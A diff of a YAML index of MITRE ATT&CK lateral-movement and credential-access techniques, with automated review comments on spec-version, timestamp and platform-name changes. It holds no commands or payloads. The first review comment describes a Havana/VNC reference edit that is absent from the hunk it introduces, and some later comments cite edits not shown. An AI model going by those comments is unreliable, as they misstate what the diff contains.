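Review bot: the only content changes in this 60-line reference block are the Havana entry (scheme http to https, retrieval date moved to September 12, 2024), the added `revoked: false`, the spec bump to 3.2.0 and the dropped `spec_version: '2.1'`; everything else is the reference list being re-sorted by author name. Say in the commit message that the reference order is generator output, otherwise a reviewer has to diff each entry to find the one real edit. Note also that only the Havana link was re-checked; every other VNC reference keeps its 2021 retrieval date.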
@@ -42097,11 +42785,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
@@ -42124,9 +42812,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
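Review bot: `spec_version: '2.1'` is stripped from this object, as it is from every other technique in this diff (T1021.004, T1091, T1021.008, T1021.002, T1550, T1021, T1563, T1021.006, T1021.003, T1021.007, T1072, T1534, T1570). `spec_version` is a required property on STIX 2.1 domain objects, so anything downstream that re-emits these entries as STIX will stop validating; if the index is consumed only by the atomic tooling, state in the commit message that the generator now drops it on purpose.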
@@ -42177,7 +42864,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests: []
T1091:
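Review bot: `x_mitre_attack_spec_version: 3.1.0` is left as-is here (and for T1021.002 and T1021.003 below) while objects that received a new `modified` stamp move to 3.2.0. That is consistent with an object untouched upstream, but it means the file now mixes 3.1.0 and 3.2.0 objects; if the generator is expected to normalize the spec version it is not doing so, and if not, the mixed state should be a known and documented one.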
@@ -42241,7 +42927,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1021.008:
@@ -42312,7 +42997,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -42349,7 +43033,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
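Review bot: `modified` for T1563.001 moves backwards, from 2021-04-29T14:49:39.188Z to 2020-03-23T23:11:24.682Z. A regenerated object should never carry an older `modified` than the one it replaces; together with the next hunk, which deletes `x_mitre_attack_spec_version: 2.1.0` without a replacement, this looks like the entry was rebuilt from a different (older) STIX bundle than the rest of the file. Check which source the generator pulled T1563.001 from before merging, and keep in mind that consumers using `modified` for change detection will treat this as an update.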
@@ -42380,8 +43064,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
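Review bot: after this hunk T1563.001 has neither `spec_version` nor `x_mitre_attack_spec_version`, whereas every other object in the diff keeps an `x_mitre_attack_spec_version` of 3.1.0 or 3.2.0. Either restore the spec version field for this object or document that it is intentionally left in a legacy shape; a silently unversioned entry is the kind of thing a schema check should catch.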
@@ -42464,12 +43146,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -42496,6 +43177,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -42513,12 +43195,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
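Review bot: the platform rename here (`Office 365` and `Google Workspace` out, `Office Suite` and `Identity Provider` in, version 1.3 to 1.4) is the same collapse applied to T1080, T1021.007 and T1534 in this diff, but `Google Workspace` has no one-to-one successor; it is folded into `Office Suite`/`Identity Provider`. Any per-platform index or filter that still keys on the literal strings `Office 365`, `Google Workspace` or `Azure AD` will silently lose these techniques, so those consumers need to be updated in the same change.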
@@ -42544,14 +43226,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -42669,7 +43350,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -42723,11 +43403,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42779,14 +43458,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests: []
T1021.003:
@@ -42872,12 +43550,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42897,6 +43574,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -42904,7 +43582,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -42920,39 +43597,40 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -42977,12 +43655,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -42996,13 +43673,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -43019,7 +43695,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -43067,7 +43743,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -43100,7 +43776,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1210:
@@ -43139,7 +43814,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
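Review bot: same `modified` regression as T1563.001 earlier in this diff: T1210 goes from 2022-05-11T14:00:00.188Z back to 2022-02-24T15:06:46.006Z, and the following hunk removes its `x_mitre_attack_spec_version: 2.1.0` without adding a replacement. The old stamps on T1210, T1563.001 and the old T1056.004 all share the `.188Z` suffix, which suggests they were assigned in bulk rather than per edit, while the new values look like real last-edit times; whichever source is authoritative, `modified` should come from one consistent source for the whole file, not from one bundle for most objects and another for these two.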
@@ -43173,12 +43848,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1534:
technique:
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
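Review bot: T1210 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here with no `x_mitre_attack_spec_version: 3.2.0` added in the visible lines, whereas the other reworked techniques in this diff (T1556.003, T1555.001, T1003.004) get the 3.2.0 value re-added. If the field is re-added for T1210 outside this hunk that is fine; otherwise this technique is left with no attack-spec version at all, which the generator should treat as an error rather than silently emit.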
@@ -43206,10 +43879,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
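Review bot: the platform list for T1534 drops `Office 365` and `Google Workspace` in favour of a single `Office Suite` entry, and the same consolidation (plus `Azure AD` becoming `Identity Provider`) repeats in later hunks. Any downstream filter or per-platform index that matches on the old platform strings will silently return nothing after this change, so those consumers need checking alongside the version bump from 1.3 to 1.4.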
@@ -43239,7 +43911,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -43301,12 +43972,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -43330,11 +44000,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -43359,9 +44028,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -43421,7 +44089,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests: []
T1550.002:
@@ -43476,7 +44143,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1021.001:
@@ -43544,12 +44210,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -43606,6 +44271,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43616,13 +44282,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -43681,7 +44346,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -43775,49 +44439,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
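Review bot: the 38 deleted lines under `T1556.003: technique:` (platforms, domains, contributors, markings, id, created, the external reference list) are not data removals; the same values reappear in the next hunk in a different key order, with the references also resequenced (PAM Creds now precedes Red Hat PAM and PAM Backdoor). The only substantive change in this hunk is the `modified` timestamp, so consider having the generator emit keys in a stable order to keep future index diffs reviewable.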
@@ -43832,20 +44457,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1056.001:
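Review bot: `x_mitre_permissions_required: - root` is removed from T1556.003 with nothing replacing it in this hunk, while `x_mitre_attack_spec_version` jumps from 2.1.0 to 3.2.0 and `x_mitre_version` from 2.0 to 2.1. The same field (`- SYSTEM`) disappears from T1003.004 later in this diff, so the removal is systematic; if any report or index template still reads `x_mitre_permissions_required`, it needs a fallback now, and the PR description should mention the field going away.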
@@ -43925,12 +44587,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43959,6 +44620,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
@@ -43970,18 +44632,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -44008,14 +44670,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests: []
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
